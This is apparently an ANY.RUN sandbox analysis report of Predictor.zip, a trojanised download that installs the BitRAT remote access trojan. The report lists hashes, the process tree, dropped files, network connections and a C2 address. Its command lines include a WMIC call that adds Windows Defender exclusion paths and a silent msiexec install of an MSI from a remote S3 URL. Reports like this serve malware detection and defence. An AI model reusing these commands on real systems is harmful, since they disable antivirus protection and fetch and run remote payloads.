analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Predictor.zip

Full analysis: https://app.any.run/tasks/cb155241-20d8-4544-b8fb-bc094c6b4a41
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: October 20, 2020, 13:45:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
bitrat
rat
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract
MD5:

DC8750DE25E8A8978564C563ABB3B4D9

SHA1:

EE99A86A84BEAA9F9CEE8CB95AD91688327CC8C4

SHA256:

0A49C8402432452F05CE2FBF9014E2B0B6E3D065A6048725AF77DB57F0F24F57

SSDEEP:

393216:mZBLxYL1qTCXEAY9xFI2zoI8qbk4T0opRrZP:gPWEAY9xFdfhk94Rrx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Predictor v7.23.2.exe (PID: 3732)
      • QVhqPEnbQOXYtZf6.exe (PID: 3492)
      • Predictor v7.23.2.exe (PID: 2520)
      • rezaza.exe (PID: 2920)

    • Changes the autorun value in the registry

      • rezaza.exe (PID: 2920)

    • Connects to CnC server

      • rezaza.exe (PID: 2920)

    • BITRAT was detected

      • rezaza.exe (PID: 2920)

    • Uses Microsoft Installer as loader

      • Predictor v7.23.2.exe (PID: 2520)

    • Changes settings of System certificates

      • msiexec.exe (PID: 3412)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 1076)
      • msiexec.exe (PID: 3412)
      • rezaza.exe (PID: 2920)
      • expand.exe (PID: 3972)

    • Creates files in the Windows directory

      • expand.exe (PID: 3972)

    • Reads Internet Cache Settings

      • rezaza.exe (PID: 2920)
      • msiexec.exe (PID: 3412)

    • Starts CMD.EXE for commands execution

      • Predictor v7.23.2.exe (PID: 2520)

    • Adds / modifies Windows certificates

      • msiexec.exe (PID: 3412)

  • INFO

    • Application launched itself

      • msiexec.exe (PID: 3412)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xpi | Mozilla Firefox browser extension (66.6)
.zip | ZIP compressed archive (33.3)

EXIF

ZIP

ZipFileName: Predictor/
ZipUncompressedSize: -
ZipCompressedSize: -
ZipCRC: 0x00000000
ZipModifyDate: 2020:10:18 00:43:14
ZipCompression: None
ZipBitFlag: -
ZipRequiredVersion: 10
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
13
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
drop and start drop and start start drop and start winrar.exe predictor v7.23.2.exe no specs predictor v7.23.2.exe wmic.exe no specs wmic.exe no specs msiexec.exe no specs msiexec.exe msiexec.exe no specs expand.exe #BITRAT rezaza.exe cmd.exe no specs msiexec.exe no specs qvhqpenbqoxytzf6.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1076"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Predictor.zip"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3732"C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exeWinRAR.exe
User:
admin
Company:
TODO: <Company name>
Integrity Level:
MEDIUM
Description:
Projectcalcule
Exit code:
3221226540
Version:
1.0.0.1
2520"C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exe
WinRAR.exe
User:
admin
Company:
TODO: <Company name>
Integrity Level:
HIGH
Description:
Projectcalcule
Exit code:
0
Version:
1.0.0.1
2300"C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\LocalC:\Windows\System32\wbem\WMIC.exePredictor v7.23.2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
2147749902
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1880"C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\RoamingC:\Windows\System32\wbem\WMIC.exePredictor v7.23.2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
2147749902
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3228"C:\Windows\System32\msiexec.exe" /i https://plugsa.s3.eu-west-2.amazonaws.com/rezaza.msi /qnC:\Windows\System32\msiexec.exePredictor v7.23.2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3412C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3600C:\Windows\system32\MsiExec.exe -Embedding 5217B20031815CAA57EEF38E12B2D999C:\Windows\system32\MsiExec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3972"C:\Windows\System32\expand.exe" -R files.cab -F:* filesC:\Windows\System32\expand.exe
MsiExec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
LZ Expansion Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2920"C:\Users\admin\AppData\Local\Temp\MW-b779d397-3981-4fe0-9dd0-c3d013ec61a5\files\rezaza.exe" C:\Users\admin\AppData\Local\Temp\MW-b779d397-3981-4fe0-9dd0-c3d013ec61a5\files\rezaza.exe
MsiExec.exe
User:
admin
Integrity Level:
HIGH
Total events
1 689
Read events
1 602
Write events
0
Delete events
0

Modification events

No data
Executable files
13
Suspicious files
5
Text files
84
Unknown types
2

Dropped files

PID
Process
Filename
Type
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\bytes_methods.htext
MD5:D63054D05B04611AF3FE09695AA1A92C
SHA256:2DBFB55B484545B94247D1CE65702F1460ADC970EDCD0DD4A86B2957902728FB
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\complexobject.htext
MD5:FA93753FDBEFD8869D0EFE7EBC0E52A7
SHA256:581414618CD495C42A82C3F0AB1A4E3F10A294E2FB4BB1EFCFEB44BCD0EC3A42
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\cobject.htext
MD5:D6E7C73D1BC041419AF7D022C0380162
SHA256:D0101474D455F4875B51852518C7FCE359373708147936727697F2B0EC5764BE
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\bytearrayobject.htext
MD5:0310F1528CA7A9966680F95117EA487E
SHA256:400E6E276FC3FA823F29629FECFF302BD08D1ABB896FB500C4FAA334AA3293FD
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\boolobject.htext
MD5:DCC48FC557F8337D7BAA90E13D34B36A
SHA256:9483A995582F2DDAD6B47F85BB300371346CA10E846B923170D39E523815134F
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\cellobject.htext
MD5:BAA321AEBD7EF2A8D505C75B76F50BEC
SHA256:A277081668BC14F99518B3B7FBC8C8E1B98CC89BD3D1E6AB02D864ECE1209A9C
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\codecs.htext
MD5:E6925D7D994B61C347D437A5368B3701
SHA256:AFBBB487A45D9D9202D0FD6A1167CC8718B6EC3B2AFA758F1708FBFEC99ADF86
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\AntiBusteds (2).dlltext
MD5:113F80EE3DC312A093CE9E89F95404FE
SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\AntiBusteds (1).dlltext
MD5:113F80EE3DC312A093CE9E89F95404FE
SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\datetime.htext
MD5:958421EA055F38A3A54538A6C84795D5
SHA256:A80CA694DCCFE8EE65E3BBD2DFC57ADF2BE9464CA37EFE2B84471FF1FD61CDE7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2920
rezaza.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTuqL92L3tjkN67RNFF%2FEdvT6NEzAQUwBKyKHRoRmfpcCV0GgBFWwZ9XEQCEAdpsdVygbqahES8p3NLYzE%3D
US
der
471 b
whitelisted
2920
rezaza.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAGC%2BAmOouYmuRo7J4Qfua8%3D
US
der
1.47 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2920
rezaza.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2920
rezaza.exe
52.95.149.98:443
drtus.s3.eu-west-2.amazonaws.com
Amazon.com, Inc.
GB
shared
2920
rezaza.exe
185.244.128.7:9944
malicious
3412
msiexec.exe
52.95.150.26:443
plugsa.s3.eu-west-2.amazonaws.com
Amazon.com, Inc.
GB
shared

DNS requests

Domain
IP
Reputation
plugsa.s3.eu-west-2.amazonaws.com
  • 52.95.150.26
shared
drtus.s3.eu-west-2.amazonaws.com
  • 52.95.149.98
shared
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

PID
Process
Class
Message
2920
rezaza.exe
A Network Trojan was detected
ET TROJAN Observed Malicious SSL Cert (BitRAT CnC)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Predictor.zip